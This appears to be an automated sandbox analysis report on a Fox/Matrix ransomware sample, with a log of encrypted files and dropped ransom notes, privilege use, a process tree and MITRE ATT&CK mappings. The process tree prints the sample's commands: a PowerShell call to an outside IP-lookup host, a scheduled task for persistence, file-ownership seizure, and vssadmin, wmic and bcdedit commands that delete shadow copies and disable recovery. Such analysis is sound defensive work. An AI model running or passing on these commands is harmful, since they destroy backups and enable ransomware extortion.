91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Trust Protection Lists\Sigma\Staging.DATA 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\QuickStyles\linessimple.dotx 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\fonts\LucidaTypewriterBold.ttf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files\Microsoft Office\root\Integration\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Wisp.thmx 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.DataIntegration.FuzzyMatching.dll 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\fi-fi\ui-strings.js 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\OFFICE\Heartbeat\HeartbeatCache.xml 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\hr-hr\ui-strings.js 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib\LibCurl64.DllA\OpenSSL64.DllA\libcrypto-1_1-x64.dll 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\sk-sk\ui-strings.js 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\plugin.js 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\Download\{F3C4FE00-EFD5-403B-9569-398A20F1BA4A}\1.3.181.5\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.25\System.Diagnostics.DiagnosticSource.dll 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlusVL_MAK-ul-oob.xrm-ms 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_filter-focus_32.svg 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\1033\VVIEWRES.DLL 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files\dotnet\LICENSE.txt 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files\Google\Chrome\Application\106.0.5249.119\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\PersonalR_OEM_Perp-pl.xrm-ms 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\Fonts\private\SEGOEUISL.TTF 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_filterselected-default_32.svg 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.36.151\goopdateres_mr.dll 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\sv-se\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\dcpr.dll 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files\Java\jdk-1.8\jre\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ucrtbase.dll 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\EXPEDITN\EXPEDITN.ELM 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\root\ui-strings.js 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\security\policy\limited\local_policy.jar 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\vk_swiftshader.dll 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\ja-jp\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\fr-fr\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.25\System.ObjectModel.dll 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales\te.pak 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioPro2019VL_MAK_AE-ul-oob.xrm-ms 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\MSO0127.ACL 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\manifest.json 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\zh-TW.pak.DATA 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\sk-sk\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\ja-jp\ui-strings.js 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\it\Microsoft.Build.Engine.resources.dll 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ko-kr\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\root\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected] 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusiness2019R_OEM_Perp-ul-phn.xrm-ms 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Standard2019VL_MAK_AE-ppd.xrm-ms 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\audio_filter\libstereo_widen_plugin.dll 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\access\libudp_plugin.dll 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\nl-nl\ui-strings.js 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\example_icons2x.png 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files\7-Zip\Lang\da.txt 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files\7-Zip\7-zip.chm 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\SKY\PREVIEW.GIF 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\it\System.Data.Linq.Resources.dll 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\es-es\ui-strings.js 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\uk-ua\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 7008 schtasks.exe -
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 9372 vssadmin.exe -
Suspicious behavior: EnumeratesProcesses 12 IoCs
pid Process 5264 powershell.exe 5264 powershell.exe 6812 HPTbJaR964.exe 6812 HPTbJaR964.exe 6812 HPTbJaR964.exe 6812 HPTbJaR964.exe 6812 HPTbJaR964.exe 6812 HPTbJaR964.exe 6812 HPTbJaR964.exe 6812 HPTbJaR964.exe 6812 HPTbJaR964.exe 6812 HPTbJaR964.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 6812 HPTbJaR964.exe -
Suspicious use of AdjustPrivilegeToken 49 IoCs
description pid Process Token: SeDebugPrivilege 5264 powershell.exe Token: SeTakeOwnershipPrivilege 10140 takeown.exe Token: SeDebugPrivilege 6812 HPTbJaR964.exe Token: SeLoadDriverPrivilege 6812 HPTbJaR964.exe Token: SeBackupPrivilege 7596 vssvc.exe Token: SeRestorePrivilege 7596 vssvc.exe Token: SeAuditPrivilege 7596 vssvc.exe Token: SeIncreaseQuotaPrivilege 9712 WMIC.exe Token: SeSecurityPrivilege 9712 WMIC.exe Token: SeTakeOwnershipPrivilege 9712 WMIC.exe Token: SeLoadDriverPrivilege 9712 WMIC.exe Token: SeSystemProfilePrivilege 9712 WMIC.exe Token: SeSystemtimePrivilege 9712 WMIC.exe Token: SeProfSingleProcessPrivilege 9712 WMIC.exe Token: SeIncBasePriorityPrivilege 9712 WMIC.exe Token: SeCreatePagefilePrivilege 9712 WMIC.exe Token: SeBackupPrivilege 9712 WMIC.exe Token: SeRestorePrivilege 9712 WMIC.exe Token: SeShutdownPrivilege 9712 WMIC.exe Token: SeDebugPrivilege 9712 WMIC.exe Token: SeSystemEnvironmentPrivilege 9712 WMIC.exe Token: SeRemoteShutdownPrivilege 9712 WMIC.exe Token: SeUndockPrivilege 9712 WMIC.exe Token: SeManageVolumePrivilege 9712 WMIC.exe Token: 33 9712 WMIC.exe Token: 34 9712 WMIC.exe Token: 35 9712 WMIC.exe Token: 36 9712 WMIC.exe Token: SeIncreaseQuotaPrivilege 9712 WMIC.exe Token: SeSecurityPrivilege 9712 WMIC.exe Token: SeTakeOwnershipPrivilege 9712 WMIC.exe Token: SeLoadDriverPrivilege 9712 WMIC.exe Token: SeSystemProfilePrivilege 9712 WMIC.exe Token: SeSystemtimePrivilege 9712 WMIC.exe Token: SeProfSingleProcessPrivilege 9712 WMIC.exe Token: SeIncBasePriorityPrivilege 9712 WMIC.exe Token: SeCreatePagefilePrivilege 9712 WMIC.exe Token: SeBackupPrivilege 9712 WMIC.exe Token: SeRestorePrivilege 9712 WMIC.exe Token: SeShutdownPrivilege 9712 WMIC.exe Token: SeDebugPrivilege 9712 WMIC.exe Token: SeSystemEnvironmentPrivilege 9712 WMIC.exe Token: SeRemoteShutdownPrivilege 9712 WMIC.exe Token: SeUndockPrivilege 9712 WMIC.exe Token: SeManageVolumePrivilege 9712 WMIC.exe Token: 33 9712 WMIC.exe Token: 34 9712 WMIC.exe Token: 35 9712 WMIC.exe Token: 36 9712 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 756 wrote to memory of 4900 756 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe 85 PID 756 wrote to memory of 4900 756 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe 85 PID 756 wrote to memory of 4900 756 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe 85 PID 756 wrote to memory of 3528 756 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe 88 PID 756 wrote to memory of 3528 756 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe 88 PID 756 wrote to memory of 3528 756 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe 88 PID 756 wrote to memory of 1260 756 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe 93 PID 756 wrote to memory of 1260 756 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe 93 PID 756 wrote to memory of 1260 756 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe 93 PID 1260 wrote to memory of 5264 1260 cmd.exe 95 PID 1260 wrote to memory of 5264 1260 cmd.exe 95 PID 1260 wrote to memory of 5264 1260 cmd.exe 95 PID 756 wrote to memory of 5688 756 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe 99 PID 756 wrote to memory of 5688 756 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe 99 PID 756 wrote to memory of 5688 756 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe 99 PID 756 wrote to memory of 4804 756 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe 98 PID 756 wrote to memory of 4804 756 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe 98 PID 756 wrote to memory of 4804 756 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe 98 PID 5688 wrote to memory of 4448 5688 cmd.exe 101 PID 5688 wrote to memory of 4448 5688 cmd.exe 101 PID 5688 wrote to memory of 4448 5688 cmd.exe 101 PID 5688 wrote to memory of 2852 5688 cmd.exe 103 PID 5688 wrote to memory of 2852 5688 cmd.exe 103 PID 5688 wrote to memory of 2852 5688 cmd.exe 103 PID 756 wrote to memory of 888 756 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe 102 PID 756 wrote to memory of 888 756 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe 102 PID 756 wrote to memory of 888 756 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe 102 PID 4804 wrote to memory of 4536 4804 cmd.exe 104 PID 4804 wrote to memory of 4536 4804 cmd.exe 104 PID 4804 wrote to memory of 4536 4804 cmd.exe 104 PID 5688 wrote to memory of 4780 5688 cmd.exe 106 PID 5688 wrote to memory of 4780 5688 cmd.exe 106 PID 5688 wrote to memory of 4780 5688 cmd.exe 106 PID 888 wrote to memory of 4500 888 cmd.exe 109 PID 888 wrote to memory of 4500 888 cmd.exe 109 PID 888 wrote to memory of 4500 888 cmd.exe 109 PID 4536 wrote to memory of 2880 4536 wscript.exe 110 PID 4536 wrote to memory of 2880 4536 wscript.exe 110 PID 4536 wrote to memory of 2880 4536 wscript.exe 110 PID 2880 wrote to memory of 7008 2880 cmd.exe 113 PID 2880 wrote to memory of 7008 2880 cmd.exe 113 PID 2880 wrote to memory of 7008 2880 cmd.exe 113 PID 888 wrote to memory of 9772 888 cmd.exe 114 PID 888 wrote to memory of 9772 888 cmd.exe 114 PID 888 wrote to memory of 9772 888 cmd.exe 114 PID 4536 wrote to memory of 3980 4536 wscript.exe 116 PID 4536 wrote to memory of 3980 4536 wscript.exe 116 PID 4536 wrote to memory of 3980 4536 wscript.exe 116 PID 888 wrote to memory of 10140 888 cmd.exe 118 PID 888 wrote to memory of 10140 888 cmd.exe 118 PID 888 wrote to memory of 10140 888 cmd.exe 118 PID 3980 wrote to memory of 8180 3980 cmd.exe 119 PID 3980 wrote to memory of 8180 3980 cmd.exe 119 PID 3980 wrote to memory of 8180 3980 cmd.exe 119 PID 888 wrote to memory of 9676 888 cmd.exe 121 PID 888 wrote to memory of 9676 888 cmd.exe 121 PID 888 wrote to memory of 9676 888 cmd.exe 121 PID 9676 wrote to memory of 8860 9676 cmd.exe 122 PID 9676 wrote to memory of 8860 9676 cmd.exe 122 PID 9676 wrote to memory of 8860 9676 cmd.exe 122 PID 8860 wrote to memory of 6812 8860 HPTbJaR9.exe 124 PID 8860 wrote to memory of 6812 8860 HPTbJaR9.exe 124 PID 9728 wrote to memory of 9372 9728 cmd.exe 125 PID 9728 wrote to memory of 9372 9728 cmd.exe 125 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 4500 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe"1⤵
- Matrix Ransomware
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:756 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe" "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWqByALz.exe"2⤵PID:4900
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWqByALz.exe"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWqByALz.exe" -n2⤵
- Executes dropped EXE
PID:3528
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sh0xZKMv.txt"2⤵
- Suspicious use of WriteProcessMemory
PID:1260 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5264
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\g4TNSf12.vbs"2⤵
- Suspicious use of WriteProcessMemory
PID:4804 -
C:\Windows\SysWOW64\wscript.exewscript //B //Nologo "C:\Users\Admin\AppData\Roaming\g4TNSf12.vbs"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4536 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\Om77BD4u.bat" /sc minute /mo 5 /RL HIGHEST /F4⤵
- Suspicious use of WriteProcessMemory
PID:2880 -
C:\Windows\SysWOW64\schtasks.exeschtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\Om77BD4u.bat" /sc minute /mo 5 /RL HIGHEST /F5⤵
- Creates scheduled task(s)
PID:7008
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA4⤵
- Suspicious use of WriteProcessMemory
PID:3980 -
C:\Windows\SysWOW64\schtasks.exeschtasks /Run /I /tn DSHCA5⤵PID:8180
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\MyZplpC7.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f2⤵
- Suspicious use of WriteProcessMemory
PID:5688 -
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\MyZplpC7.bmp" /f3⤵
- Sets desktop wallpaper using registry
PID:4448
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f3⤵PID:2852
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f3⤵PID:4780
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Bz1SrKdj.bat" "C:\Users\All Users\USOPrivate\UpdateStore\store.db""2⤵
- Suspicious use of WriteProcessMemory
PID:888 -
C:\Windows\SysWOW64\attrib.exeattrib -R -A -S "C:\Users\All Users\USOPrivate\UpdateStore\store.db"3⤵
- Views/modifies file attributes
PID:4500
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\USOPrivate\UpdateStore\store.db" /E /G Admin:F /C3⤵PID:9772
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\USOPrivate\UpdateStore\store.db"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:10140
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c HPTbJaR9.exe -accepteula "store.db" -nobanner3⤵
- Suspicious use of WriteProcessMemory
PID:9676 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\HPTbJaR9.exeHPTbJaR9.exe -accepteula "store.db" -nobanner4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:8860 -
C:\Users\Admin\AppData\Local\Temp\HPTbJaR964.exeHPTbJaR9.exe -accepteula "store.db" -nobanner5⤵
- Drops file in Drivers directory
- Sets service image path in registry
- Executes dropped EXE
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:6812
-
-
-
-
-
C:\Windows\SYSTEM32\cmd.exeC:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Om77BD4u.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:9728 -
C:\Windows\system32\vssadmin.exevssadmin Delete Shadows /All /Quiet2⤵
- Interacts with shadow copies
PID:9372
-
-
C:\Windows\System32\Wbem\WMIC.exewmic SHADOWCOPY DELETE2⤵
- Suspicious use of AdjustPrivilegeToken
PID:9712
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No2⤵
- Modifies boot configuration data using bcdedit
PID:10064
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:332
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Delete /TN DSHCA /F2⤵PID:4812
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:7596
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Defense Evasion
File and Directory Permissions Modification
1Hide Artifacts
1Hidden Files and Directories
1Indicator Removal
2File Deletion
2Modify Registry
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5186cd829b204d8868af918e50b117f94
SHA19f1f0f68dc3e27b296cc4bd6132b352bfc044212
SHA25687beafdf07492dcc59f4f4aa421eab4bb3063eb0adbf19cbea4ed4d8933e3c48
SHA512d4f57f959278a5bb237f27b6bcb6a3d9dbb2740f987598b325dcf0adb1d4578cb13956f1fe40ac3269343ca6259a8c8c17e3e20e767b6580e989ebb8603ee7db
-
Filesize
8KB
MD5966d6932b42e60689add6145730b6709
SHA1603d241341407bd1433e3d9b40ab29810741abed
SHA2566e638c0558196d58fc35916771df9a48b90ac5c1e853297eac0fd0aa907f5b23
SHA512fecc86b7b95f7ae5a1a5b5b50d6c11692cccfd06f0daa54b3b76728bed863c06cb3a26287d60cc00cda9f63b84540c2da1fea8e772ff5dba6e14001ce0871a3b
-
C:\ProgramData\Microsoft\ClickToRun\MachineData\Catalog\Packages\{9AC08E99-230B-47E8-9721-4577B7F124EA}\{1A8308C7-90D1-4200-B16E-646F163A08E8}\[[email protected] ].Yctmwr7w-bTJKEwwh.FOX
Filesize3.3MB
MD58e3e456103e2e767a1f68ec10abc0bfa
SHA1b6392c4df15c7a762194db3623b157a0a2955680
SHA256a4cee0be94c8909c6b1e4ba0995dffa5e1bd0fa2961ee5a132a399be6d1c8eac
